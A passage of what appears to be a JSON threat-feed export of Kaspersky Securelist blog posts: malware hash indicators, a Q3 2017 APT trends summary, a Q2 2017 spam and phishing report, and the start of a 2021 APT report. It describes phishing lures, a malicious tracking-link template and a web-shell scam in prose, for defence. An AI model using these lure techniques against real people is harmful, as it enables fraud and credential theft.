72b039550d31afaeee11dedf7d80333aeda5c504272d426ae0d91bc0cd82c5b0
72d2ad8f38e60c23c96698149507fc627664a5706a4431b96014fbf25495b529
788f7fd06030f87d411c61efbc52a3efca03359570353da209b2ce4ccf5b4b70
7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04
84adba3c81ad1c2a8285c31d1171f6f671492d9f3ed5ee2c7af326a9a8dc5278
852ccc491204f227c3da58a00f53846296454d124b23021bdb168798c8eee2fb
\n86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 \n9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7e \nb597d7b5b9c2f1962257f912e911961ad0da4c28fc6a90a0b7db4e242aa007d8 \nbfb88878a22c23138a67cc25872e82d77e54036b846067ddc43e988c50379915 \nc23f715c8588c8d8725352ed515749389d898996107132b2d25749a4efc82a90 \nc47bc2c15f08655d158bb8c9d5254c804c9b6faded526be6879fa94ea4a64f72 \ndb53b35c80e8ec3f8782c4d34c83389e8e9b837a6b3cc700c1b566e4e4450ec2 \ndd9debe517717552d7422b08a477faa01badbcc4074830c080a1a1c763e1a544 \nb800d29d6e1f2f85c5bc036e927c1dae745a3c646389599b0754592d76b5564b", "cvss3": {}, "published": "2017-10-30T09:00:39", "type": "securelist", "title": "Gaza Cybergang \u2013 updated activity in 2017:", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-10-30T09:00:39", "href": "https://securelist.com/gaza-cybergang-updated-2017-activity/82765/", "id": "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-14T11:34:42", "description": "\n\n## Introduction\n\nBeginning in the second quarter of 2017, Kaspersky's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.\n\nAs stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. 
However, if you would like to learn more about our intelligence reports or request more information on a specific report, readers are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Chinese-Speaking Actors\n\nThe third quarter demonstrated to us that Chinese-speaking actors have not \"disappeared\" and are still very much active, conducting espionage against a wide range of countries and industry verticals. In total, 10 of the 24 reports produced centered around activity attributed to multiple actors in this region.\n\nThe most interesting of these reports focused on two supply-chain attacks: Netsarang / ShadowPad and CCleaner. In July 2017, we discovered a previously unknown malware framework (ShadowPad) embedded inside the installation packages hosted on the Netsarang distribution site. Netsarang's server management software is popular and used throughout the world. The ShadowPad framework contained a dormant backdoor that the threat actor could activate remotely by returning a specific value in a DNS TXT record. Others in the research community have loosely attributed this attack to the threat actor Microsoft refers to as BARIUM. Following up on this supply-chain attack, another was reported initially by Cisco Talos in September involving CCleaner, a popular cleaner / optimization tool for PCs. The actors responsible signed the malicious installation packages with a legitimate Piriform code-signing certificate and pushed the malware between August and September.\n\nQ3 also showed that China is very interested in policies and negotiations between Russia and other countries. We reported on two separate campaigns demonstrating this interest. To date, we have observed three separate incidents where Russia and another country hold talks and are targeted shortly thereafter, IndigoZebra being the first. 
IronHusky was a campaign we first discovered in July targeting Russian and Mongolian government bodies, aviation companies, and research institutes. Earlier in April, the two countries had held talks related to modernizing the Mongolian air defenses with Russia's help. Shortly after these talks, both were targeted with a Poison Ivy variant from a Chinese-speaking threat actor. In June, India and Russia signed a much-awaited agreement to expand a nuclear power plant in India, as well as to further define the defense cooperation between the two countries. Very soon after, both countries' energy sectors were targeted with a new piece of malware we refer to as \"H2ODecomposition\". In some cases this malware was masquerading as a popular Indian antivirus solution (QuickHeal). The name of the malware was derived from an initial RC5 string used in the encryption process (2H2O=2H2+O2), which describes the decomposition of water into hydrogen and oxygen (the reverse of the reaction that powers a hydrogen fuel cell).\n\nOther reports published in the third quarter under Chinese-speaking actors were mainly updates to TTPs by known adversaries such as Spring Dragon, Ocean Lotus, Blue Termite, and Bald Knight. The Spring Dragon report summarized the evolution of their malware to date. Ocean Lotus was observed conducting watering hole attacks on the ASEAN website (as done previously) but with a new toolkit. A new testing version of Emdivi was discovered in use by Blue Termite, along with their testing of CVE-2017-0199 exploits. Finally, Bald Knight (AKA Tick) was seen using their popular XXMM malware family to target Japan and South Korea.\n\nBelow is a summary of report titles produced for the Chinese region. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n 1. Analysis and evolution of Spring Dragon tools\n 2. 
EnergyMobster - Campaign targeting Russian-Indian energy project\n 3. IronHusky - Intelligence of Russian-Mongolian military negotiations\n 4. The Bald Knight Rises\n 5. Massive watering holes campaign targeting Asia-Pacific\n 6. Massive Watering Holes Campaign Targeting AsiaPacific - The Toolset\n 7. NetSarang software backdoored in supply chain attack - early warning\n 8. ShadowPad - popular server management software hit in supply chain attack\n 9. New BlueTermite samples and potential new wave of attacks\n 10. CCleaner backdoored - more supply chain attacks\n\n## Russian-Speaking Actors\n\nThe third quarter was a bit slower with respect to Russian speaking threat actors. We produced four total reports, two of which focused on ATM malware, one on financial targeting in Ukraine and Russia, and finally a sort of wrap-up of Sofacy activity over the summer.\n\nThe ATM related reports centered around Russian speaking actors using two previously unknown pieces of malware designed specifically for certain models. \"Cutlet Maker\" and \"ATMProxy\" both ultimately allowed the users to dispense cash at will from a chosen cartridge within the ATMs. ATMProxy was interesting since it would sit dormant on an ATM until a card with a specific hard coded number was inserted, at which point it would dispense more cash than what was requested.\n\nAnother report discussed a new technique utilizing highly targeted watering holes to target financial entities in Ukraine and Russia with Buhtrap. Buhtrap has been around since at least 2014, but this new wave of attacks was leveraging search engine optimization (SEO) to float malicious watering hole sites to the top of search results, thus providing more of a chance for valid targets to visit the malicious sites.\n\nFinally, we produced a summary report on Sofacy's summertime activity. Nothing here was groundbreaking, but rather showed the group remained active with their payloads of choice; SPLM, GAMEFISH, and XTUNNEL. 
Targeting also remained the same, focusing on European defense entities, Turkey, and former republics.\n\nBelow is a list of report titles for reference:\n\n 1. ATMProxy - A new way to rob ATMs\n 2. [Cutlet maker - Newly identified ATM malware families sold on Darknet](<https://securelist.com/atm-malware-is-being-sold-on-darknet-market/81871/>)\n 3. Summertime Sofacy - July 2017\n 4. Buhtrap - New wave of attacks on financial targets\n\n## English-Speaking Actors\n\nThe last quarter also had us reporting on yet another member of the Lamberts family. Red Lambert was discovered during our previous analysis of Grey Lambert and utilized hard coded SSL certificates in its command and control communications. What was most interesting about the Red Lambert is that we discovered a possible operational security (OPSEC) failure on the actor's part, leading us to a specific company who may have been responsible, in whole or in part, for the development of this Lambert malware.\n\n 1. The Red Lambert\n\n## Korean-Speaking Actors\n\nWe were also able to produce two reports on Korean speaking actors, specifically involving Scarcruft and Bluenoroff. Scarcruft was seen targeting high profile, political entities in South Korea using both destructive malware as well as malware designed more for espionage. Bluenoroff, the financially motivated arm of Lazarus, targeted a Costa Rican casino using Manuscrypt. Interestingly enough, this casino was compromised by Bluenoroff six months prior as well, indicating they potentially lost access and were attempting to get back in.\n\nReport titles focusing on Korean-speaking actors:\n\n 1. Scent of ScarCruft\n 2. Bluenoroff hit Casino with Manuscrypt\n\n## Other Activity\n\nFinally, we also wrote seven other reports on \"uncategorized\" actors in the third quarter. Without going into detail on each of these reports, we will focus on two. The first being a report on the Shadowbrokers' June 2017 malware dump. 
An anonymous \"customer\" who paid to get access to the dump of files posted the hashes of the files for the month, mainly out of displeasure with what was provided for the money. We were only able to verify one of the nine file hashes, which ended up being an already known version of Triple Fantasy.\n\nThe other report we'd like to highlight (\"Pisco Gone Sour\") is one involving an unknown actor targeting Chilean critical institutions with Veil, Meterpreter, and PowerShell Empire. We are constantly searching for new adversaries in our daily routine and this appears to be just that. The use of publicly available tools makes it difficult to attribute this activity to a specific group, but our current assessment based on targeting is that the actor may be based somewhere in South America.\n\n 1. Dark Cyrene - politically motivated campaign in the Middle East\n 2. Pisco Gone Sour - Cyber Espionage Campaign Targeting Chile\n 3. Crystal Finance Millennium website used to launch a new wave of attacks in Ukraine\n 4. New Machete activity - August 2017\n 5. [ATMii](<https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/>)\n 6. Shadowbroker June 2017 Pack\n 7. [The Silence - new trojan attacking financial organizations](<https://securelist.com/the-silence/83009/>)\n\n## Final Thoughts\n\nNormally we would end this report with some predictions for the next quarter, but as it will be the end of the year soon, we will be doing a separate predictions report for 2018. Instead, we would like to point out one alarming trend we've observed over the last two quarters, which is an increase in supply chain attacks. Since Q2, there have been at least five incidents where actors have targeted the supply chain to accomplish their goals instead of going directly after the end target: MeDoc, Netsarang, CCleaner, Crystal Finance, and Elmedia. 
While these incidents were not the result of just one group, it does show how the attention of many of the actors out there may be shifting in a direction that could be much more dangerous. Successfully compromising the supply chain provides easy access to a much wider target base than available through traditional means such as spear phishing. As an added benefit, these attacks can remain undetected for months, if not longer. It remains to be seen if this trend will continue into 2018, but given the successes from the five mentioned above, we feel we haven't seen the last of this type of attack in the near future.", "cvss3": {}, "published": "2017-11-14T09:41:27", "type": "securelist", "title": "APT Trends report Q3 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-11-14T09:41:27", "href": "https://securelist.com/apt-trends-report-q3-2017/83162/", "id": "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-22T10:08:53", "description": "\n\n \n\n\n## Spam: quarterly highlights\n\n### Delivery service Trojans\n\nAt the start of Q2 2017, we registered a wave of malicious mailings imitating notifications from well-known delivery services. Trojan downloaders were sent out in ZIP archives, and after being launched they downloaded other malware \u2013 Backdoor.Win32.Androm and Trojan.Win32.Kovter. The usual trick of presenting dangerous content as important delivery information was employed by the fraudsters to make recipients open the attachment. The malicious mailings targeted people from different countries and came in a variety of languages.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_1.png>)\n\nThese fake notifications from delivery services also included malicious links to infect the victim's computer and steal personal information. 
The fraudulent link was tied to the tracking number of a non-existent shipment and used the following format:\n\nhttp://{domain}/{delivery service name}__com__WebTracking__tracknum__4MH38630431475701\n\nThe domain and the sequence of letters and numbers at the end of the link varied within the same mass mailing.\n\nAfter a user clicked on the link, a Trojan from the JS.Downloader family was downloaded, which in turn downloaded the [banking Trojan Emotet](<https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/>). This malware was first detected in June 2014, and is still used to steal personal financial information, logins and passwords for other services, as well as to send spam, etc.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_2.png>)\n\n### WannaCry in spam\n\nIn May 2017, hundreds of thousands of computers worldwide were [infected by the WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). While the majority of similar ransomware samples require some sort of user input before a computer is infected, WannaCry could do so without any user action. It exploits a vulnerability in the Windows SMBv1 service (the EternalBlue exploit, patched by Microsoft in MS17-010) and then uses the same exploit to spread to other reachable computers on the local network. Like other ransomware of this type, WannaCry encrypts files on the victim's computer and demands a ransom for decryption. The encrypted files are given the .wcry extension and become unreadable.\n\nThe media frenzy surrounding the WannaCry ransomware played into spammers' hands, as all high-profile events usually do. For example, they distributed numerous offers of services to counter the new malware, prevent infection, train users, etc. 
Scammers who earn money via fraudulent mailings also took advantage.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_3.png>)\n\nThey sent out fake notifications on behalf of well-known software vendors informing recipients that their computers had been infected with ransomware and had to be updated. The link to the supposed update, of course, led to a phishing page. We came across emails that showed the attackers hadn't taken much care when compiling their mailings, obviously hoping their victims would be in too much of a panic to notice some obvious mistakes (sender's address, URLs, etc.).\n\n### Malware in password-protected archives and the corporate sector\n\nIn the second quarter of 2017, we came across new mailings containing malicious attachments in a password-protected archive. They were obviously targeting the corporate sector.\n\nAs a rule, the distribution of password-protected archives serves two purposes. First, it is a form of social engineering, with the attackers emphasizing that all confidential data (such as business accounts) is additionally protected by a password. Second, until the files are extracted from the archive, they cannot be fully checked by antivirus software.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_4.jpg>) [](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_5.jpg>)\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_6.jpg>)\n\n_These archives contained a malicious program belonging to the Pony/FareIT family. This malware is designed to steal logins and passwords to web services stored in browsers, the URLs on which they were entered, authentication data to FTP servers, file managers, mail clients, synchronization applications, as well as crypto-currency wallets._\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_7.jpg>)\n\n_This archive contains a malicious program called Trojan-Downloader.MSWord.Agent.bkt, which is a password-protected Microsoft Word file. 
The document contains a malicious script that downloads other malicious software designed to steal bank data to the user's computer._\n\nIt is worth noting that the tendency to mask malicious mailings as business correspondence has increased. Spammers are now not only copying the style of business emails \u2013 they often use the actual details of real companies, copy auto-signatures and logos, and even the subject of the messages can correspond to the company profile. Judging by the domain addresses in the 'To' field and by the content of the emails, these mailings also target the B2B sector.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_8.jpg>)\n\n_This archive contained a malicious program belonging to the Loki Bot family designed to steal passwords from FTP, mail clients and passwords stored in browsers, as well as crypto-currency wallets._\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_9.jpg>)\n\n_This archive contains the Exploit.Win32.BypassUAC.bwc malicious program, designed to steal passwords for network resources and email clients. To elevate privilege, the malware uses an exploit that bypasses the protection of the Microsoft Windows UAC component. During the operation it uses legitimate utilities to restore passwords. _\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_10.jpg>)\n\n_This archive contains an XLS-file with a macro that was used to download HawkEye Keylogger to the victim's computer. This malicious program written in .NET intercepts keystrokes and collects information about the system where it operates: internal and external IP addresses, the OS version as well as the name of the security product and the firewall._\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_11.jpg>)\n\n_This archive contains two malicious files: EXE, disguised as PDF (detected as Trojan.Win32.VBKrypt.xdps) and an MSWord document with an exploit that uses the CVE-2017-0199 vulnerability. 
Both malicious programs download a modification of Zeus to the victim's computer._\n\nSuch targeted attacks can have different aims. In the case of ransomware, it is obvious that a company's intellectual property can be viewed as being much more valuable than the information on a private computer, so a potential victim is more likely to pay the necessary bitcoins to get it back. In the case of spyware designed to steal financial information, fraudsters can potentially hit the jackpot once they get access to a company's accounts.\n\nSpyware in the B2B sector can also be used in more sophisticated schemes of financial fraud, including MITM attacks during financial transactions. One such scheme disclosed by our colleagues is described [here](<https://securelist.com/nigerian-phishing-industrial-companies-under-attack/78565/>).\n\nInterestingly, although the payload downloaded on the victim's computer is very different, its main function is the theft of authentication data, which means that most attacks on the corporate sector have financial goals.\n\nWe shouldn't forget about the potentially dangerous situation where an attacker gains access to a corporate network and gets control of industrial equipment.\n\nOverall in the second quarter of 2017, the percentage of spam in email traffic grew slightly from the previous quarter. The number of email antivirus detections increased by 17% in Q2 vs. Q1.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Post_Component_Detections_number_Q1_Q2_EN.png>)\n\n_The number of email antivirus detections on the computers of Kaspersky Lab users,_ _Q1 and Q2 2017._\n\n### Necurs botnet continues to distribute spam\n\nThe Necurs botnet continues to distribute spam, although the volumes are much smaller than in 2016. This botnet operation is characterized by alternating periods of low and high activity, when we register up to 2 million emails a day sent to Kaspersky Lab customers. 
In addition to malicious mailings from the botnet, Necurs actively spreads pump-and-dump as well as dating spam:\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_13.jpg>)\n\nMalicious emails from the Necurs botnet are usually concise and carry attachments with DOC, PDF or other extensions. Sometimes, instead of attachments, emails include links to cloud storage services such as Dropbox, from which the malicious files are downloaded.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_14.jpg>) [](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_15.jpg>) [](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_16.jpg>)\n\n### Spam via legitimate services\n\nLast quarter we wrote that in order to bypass filters, spammers often spread advertising and fraudulent offers via legitimate means. They include, for example, the 'Invite friends' field on social networking sites, notifications about comments that are usually sent to the recipient's email address, or any other method available on the various sites that allow the sending of emails to a user's list of trusted addresses. This type of spam is more difficult to detect because the source is legitimate. Spammers also like it because this type of resource makes for easy targeting. For example, they exploit job search sites to advertise 'easy earnings' schemes or to commit financial fraud:\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_17.jpg>)\n\n### Domain fraud\n\nLast quarter we discovered several different mass mailings related to domain fraud.\n\nOne of the mailings was sent in the name of a major domain name registrar and addressed the administrators of registered domains. They were informed that it was necessary to activate a domain to confirm their administrator status and ability to manage the domain. 
These measures were allegedly taken in accordance with the amendments made to regulations by ICANN (Internet Corporation for Assigned Names and Numbers).\n\nTo do this, the administrator was told they had a limited time to create a PHP file with specific content in the root directory of the site. The email also stated that failure to observe these conditions would mean the confirmation procedure had not been completed and support for the domain would be suspended.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_18.jpg>)\n\nIf the administrator places that PHP file in the web root, the attackers effectively get a web shell: they can run arbitrary code on the server and take control of the site. The script can also harvest all user data submitted to the site on which it runs. The fact that many of these fake emails were sent to addresses belonging to banks means we can assume that the scammers wanted to collect data entered on those banks' websites, including the logins and passwords used for Internet banking.\n\nAdministrators also found themselves the target of yet another type of domain fraud. It involved the administrator of an organization receiving an email prompting them to register their domain with search engines to help potential customers find the company on the Internet. These messages came from addresses created on free hosting services.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_19.jpg>)\n\nThis service was provided on a fee basis. In order to see the list of tariffs, the recipient was asked to click a link in the email that was \"hosted\" on a legitimate website. 
After choosing a tariff, the user had to fill in and send a form that asked for detailed personal information, including credit card information.\n\n## Statistics\n\n### Proportion of spam in email traffic\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Spam_Part_World_Q2_2007_EN.png>)\n\n_Percentage of spam in global email traffic, Q1 2017 and Q2 2017_\n\nIn Q2 2017, the largest percentage of spam \u2013 57.99% \u2013 was registered in April. The average share of spam in global email traffic for the second quarter amounted to 56.97%, which was 1.07 p.p. more than in the previous quarter.\n\n### Sources of spam by country\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Countries_Spam_Sources_Q2_2007_EN.png>)\n\n_Sources of spam by country, Q2 2017_\n\nThe second quarter of 2017 saw a change in the top three sources of spam. Vietnam came first, accounting for 12.37% of world spam. It was followed by the previous quarter's leader the US, whose share dropped by 8.65 p.p. and accounted for 10.1%. China (8.96%, +1.19 p.p.) completed the top three.\n\nIndia was the fourth biggest source, responsible for 8.77% (+3.61 p.p.) of total spam, followed by Germany (5.06%, -0.31 p.p.).\n\nRussia, in sixth place, accounted for 4.99%, which is only 0.06 p.p. less than in the previous quarter.\n\nThe top 10 biggest sources also included Brazil (4.47%), France (4.35%), Iran (2.49%), and the Netherlands with a share of 1.96%.\n\n### Spam email size\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Spam_email_size_Q2_2017_EN.png>)\n\n_Breakdown of spam emails by size, Q1 2017 and Q2 2017_\n\nIn Q2 2017, the share of small emails (up to 2 KB) in spam traffic changed only slightly and averaged 37.41%, which is 1.9 p.p. more than in the first quarter. The proportion of emails sized 2\u20135 KB remained at the same level: 4.54%; and those of 5\u201310 KB (7.83%) declined by 1.36 p.p. 
and accounted for 5.94%.\n\nThe proportion of emails sized 10\u201320 KB reached 18.31%, and that of emails sized 20\u201350 KB was 27.16%. The proportion of emails of 100 KB or more was slightly more than 2%.\n\n## Malicious attachments in email\n\n### Top 10 malware families\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_TOP10_families.png>)\n\n_TOP 10 malware families in Q2 2017_\n\n[Trojan-Downloader.JS.SLoad](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.JS.SLoad/>) (8.73%) topped the rating of the most popular malware families. Trojan-Downloader.JS.Agent (3.31%) came second, while [Trojan-PSW.Win32.Fareit](<https://threats.kaspersky.com/en/threat/Trojan-PSW.Win32.Fareit>) (3.29%) rounded off the top three.\n\nTrojan-Downloader.JS.Agent (3.05%) came fourth, followed by Worm.Win32.WBVB (2.59%).\n\nNewcomers to the top 10, Backdoor.Java.QRat (1.91%) and Trojan.PDF.Phish (1.66%), occupied seventh and ninth places respectively.\n\nThe Backdoor.Java.QRat family is a cross-platform multifunctional backdoor written in Java and sold on the DarkNet as malware-as-a-service (MaaS). It is typically distributed via email as a JAR attachment.\n\nTrojan.PDF.Phish is a PDF document containing a link to a phishing site where users are prompted to enter their login and password for a specific service.\n\n### Countries targeted by malicious mailshots\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Countries_Targets_Q2_2007_EN.png>)\n\n_Distribution of email antivirus verdicts by country, Q2 2017_\n\nGermany (12.71%) was the country targeted most by malicious mailshots in Q2 2017. China, last quarter's leader, came second (12.09%), followed by the UK (9.11%).\n\nJapan (5.87%) was fourth, with Russia occupying fifth with a share of 5.67%. 
Next came Brazil (4.99%), Italy (3.96%), Vietnam (3.06%) and France (2.81%).\n\nThe US (2.31%) completed the top 10.\n\n## Phishing\n\nIn the second quarter of 2017, the Anti-Phishing system prevented 46,557,343 attempted visits to phishing pages on the computers of Kaspersky Lab users. Overall, 8.26% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q2 2017.\n\n### Geography of attacks\n\nIn Q2 2017, Brazil (18.09%) was the country where the largest percentage of users was affected by phishing attacks, although its share decreased by 1.07 p.p. compared to the previous quarter.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Geography_attacks.png>)\n\n_Geography of phishing attacks*, Q2 2017 \n* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in that country_\n\nThe percentage of users attacked in China decreased by 7.24 p.p. and amounted to 12.85%, placing the country second in this ranking. Australia added 1.96 p.p. to the previous quarter's figure and came third with 12.69%. The percentage of attacked users in New Zealand increased to 12.06% (+0.12 p.p.), with Azerbaijan (11.48%) in fifth. The Republic of South Africa (9.38%), Argentina (9.35%) and the UK (9.29%) rounded off this top 10.\n\nIn the second quarter, Russia (8.74%) exited this top 10 of countries with the largest percentage of users affected by phishing attacks, falling to 18th place.\n\nCountry | Users attacked \n---|--- \nBrazil | 18.09% \nChina | 12.85% \nAustralia | 12.69% \nNew Zealand | 12.06% \nAzerbaijan | 11.48% \nCanada | 11.28% \nQatar | 10.68% \nVenezuela | 10.56% \nSouth Africa | 9.38% \nArgentina | 9.35% \nUK | 9.29% \n \n** _TOP 10 countries by percentage of users attacked_**\n\n### Organizations under attack\n\n#### Rating the categories of organizations attacked by phishers\n\n_The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab's heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab's databases. It does not matter how the user attempts to open the page \u2013 by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat._\n\nIn Q2 2017, the Banks (23.49%, -2.33 p.p.), Payment systems (18.40%, +4.8 p.p.) and Online stores (9.58%, -1.31 p.p.) categories accounted for more than half (51.47%) of all registered attacks.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Attacked_organizations_EN.png>)\n\n_Distribution of organizations affected by phishing attacks by category, Q2 2017_\n\n### Hot topics this quarter\n\n#### Airline tickets\n\nIn the second quarter of 2017, Facebook was hit with a wave of posts that falsely claimed that major [airlines were giving away tickets for free](<https://securelist.com/two-tickets-as-bait/78686/>). Naturally, there were no promotions giving away airline tickets: fraudsters had created a number of sites on which users were congratulated on winning an air ticket and were asked to perform a series of actions to receive their prize. First, the victims were asked to post the promotional information on their Facebook page. Second, the victims had to click the \"Like\" button. After performing all the necessary actions, the website redirected the user to a resource promoted by the fraudsters. 
The content of these pages varied \u2013 from harmless ads to malicious software.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_28.png>)\n\n#### False browser blocking\n\nAlmost all the popular browsers have built-in protection against web threats. When entering a malicious or phishing page, they often warn the user of the potential dangers and recommend not visiting it.\n\nFraudsters also make use this protection measure for their own purposes and distract the victim with warnings. For example, they simulate the Chrome blocking page. A user who has ever seen this warning from the browser is more likely to trust the page and follow the criminals' prompts.\n\nThe main danger of these pages is that careful examination of the address bar doesn't help \u2013 a browser warning usually \"pops up\" on untrusted web resources.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_29.png>)\n\nHowever, they may also appear when trying to enter a domain belonging to companies that act as a hosting service. And it is precisely such warnings that cause the victims to have greater trust in them:\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_30.png>)\n\nAs a rule, when a user calls the numbers specified, the fraudsters pretend to be a support service, tricking victims into paying for services they allegedly need.\n\n#### Punycode encoding\n\nClose examination of the address bar may not help if the phishers use non-Latin characters that are similar to Latin letters to create domain names that are almost identical to the names of popular web resources. Web browsers use Punycode to represent Unicode characters in a URL. 
However, if all the characters in the domain name belong to the character set of one language, the browser will display them in the language specified rather than in Punycode.\n\nThe screenshot of the phishing page below demonstrates this technique.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_31.png>)\n\nSometimes on closer examination, you can see inconsistencies, for example, like the dot under the letter 'e'.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_32.png>)\n\nHave a look at the banner of the blocking site: it displays a URL in Punycode. However, it differs from what we see in the browser. This address is definitely not a domain owned by a well-known company.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_33.png>)\n\nTechnically, the address is completely different from the original one. Moreover, phishers have used different encodings in the names of pages before. However, for ordinary users, recognizing this type of phishing can be a problem.\n\n#### Attacks on Uber users\n\nOne of Q2's high-profile news stories was an attack on Uber users. Phishing pages were distributed via spam mailings; recipients were offered a large discount if they completed a \"registration\" form, where in addition to personal data they had to enter their bank card information. After completing the questionnaire, the user was redirected to the legitimate site of the company.\n\nBecause Uber often holds promotions and offers discounts, users are less inclined to doubt the authenticity of the offer.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_34.png>)\n\n#### TOP 3 attacked organizations\n\nFraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. 
More than half of all detections of Kaspersky Lab's heuristic anti-phishing component are for phishing pages hiding behind the names of fewer than 15 companies.\n\n**Organization** | **% ****of detected phishing links** \n---|--- \nFacebook | 8.33 \nMicrosoft Corporation | 8.22 \nYahoo! | 8.01 \n \nFor the third quarter in a row the top three organizations attacked most often by phishers remained unchanged. In Q1, Yahoo! was the organization whose brand was mentioned most often on phishing pages. However, in the second quarter it dropped to third, giving way to Facebook (8.33%) and Microsoft (8.22%).\n\nOne of the phishers' tricks is to place pages of popular organizations on domains belonging to other popular organizations. In the example below, a link to a free hosting service is shown, and while not all users will know what this is, mentioning Google is more likely to make them think it's genuine.\n\n[](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_35.png>)\n\nThe actual data form is usually located on another domain, where a user ends up after clicking on the button.\n\n## Conclusion\n\nIn Q2 2017, the average share of spam in global email traffic amounted to 56.97%, which was only 1.07 p.p. more than in the previous quarter. One of the most notable events of this quarter \u2013 the WannaCry epidemic \u2013 did not go unnoticed by spammers: numerous mass mailings contained offers of assistance in combating the ransomware, as well as various workshops and training for users.\n\nIn the second quarter, the most popular malware family was the JS.SLoad (8.73%), with another downloader, MSWord.Agent, in second (3.31%). The Fareit Trojan family (3.29%) rounded off the top three.\n\nThe Anti-Phishing system prevented over 46.5 million attempted visits to phishing pages on the computers of Kaspersky Lab users. Overall, 8.26% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q2 2017. 
Noticeably, in their earlier attacks, fraudsters counted on user carelessness and low levels of Internet literacy. However, as users are becoming more cyber savvy, phishers have had to come up with new tricks, such as placing phishing pages on domains owned by well-known organizations.", "cvss3": {}, "published": "2017-08-22T09:00:29", "title": "Spam and phishing in Q2 2017", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-08-22T09:00:29", "href": "https://securelist.com/spam-and-phishing-in-q2-2017/81537/", "id": "SECURELIST:9E653409B4D8C46D45939FA37442E456", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-04-27T12:27:51", "description": "\n\nFor four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q1 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. 
